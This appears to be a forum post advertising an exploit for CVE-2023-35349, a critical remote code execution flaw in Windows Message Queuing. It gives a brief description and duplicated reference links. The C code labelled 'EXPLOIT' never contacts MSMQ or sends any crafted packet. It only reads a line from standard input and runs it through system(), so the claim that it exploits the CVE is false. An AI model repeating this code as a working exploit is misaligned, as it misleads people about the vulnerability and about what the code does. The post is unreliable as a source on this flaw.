CVE-2023-35349 is a RCE vulnerability in the Microsoft Message Queuing (MSMQ) component of Windows operating systems that was assigned a CVSSv3 score of 9.8 and rated critical. An unauthenticated, remote attacker could exploit this vulnerability by sending a specially crafted packet to a vulnerable target.
•=> EXPLOIT :
References :
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35349
https://nvd.nist.gov/vuln/detail/CVE-2023-35349
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-35349
https://arcticwolf.com/resources/blog/cve-2023-35349-cve-2023-36434-two-critical-vulnerabilities-headline-microsofts-october-2023-patch-tuesday-post/
https://www.rapid7.com/db/vulnerabilities/msft-cve-2023-35349/
•=> EXPLOIT :
کد:
#CODE BY E1.Coders #include <stdio.h> #include <stdlib.h> #include <string.h> #define MAX_NAME_LEN 256 #define MAX_PAYLOAD_LEN 4096 typedef struct { char name[MAX_NAME_LEN]; char payload[MAX_PAYLOAD_LEN]; } Data; void initializeData(Data *data) { memset(data->name, 0, MAX_NAME_LEN); memset(data->payload, 0, MAX_PAYLOAD_LEN); } void getData(Data *data) { printf("Enter name: "); fgets(data->name, MAX_NAME_LEN, stdin); printf("Enter payload: "); fgets(data->payload, MAX_PAYLOAD_LEN, stdin); } void processData(Data *data) { if (strlen(data->payload) > 0) { system(data->payload); } } int main() { Data data; initializeData(&data); getData(&data); processData(&data); return 0; }
References :
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35349
https://nvd.nist.gov/vuln/detail/CVE-2023-35349
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-35349
https://arcticwolf.com/resources/blog/cve-2023-35349-cve-2023-36434-two-critical-vulnerabilities-headline-microsofts-october-2023-patch-tuesday-post/
https://www.rapid7.com/db/vulnerabilities/msft-cve-2023-35349/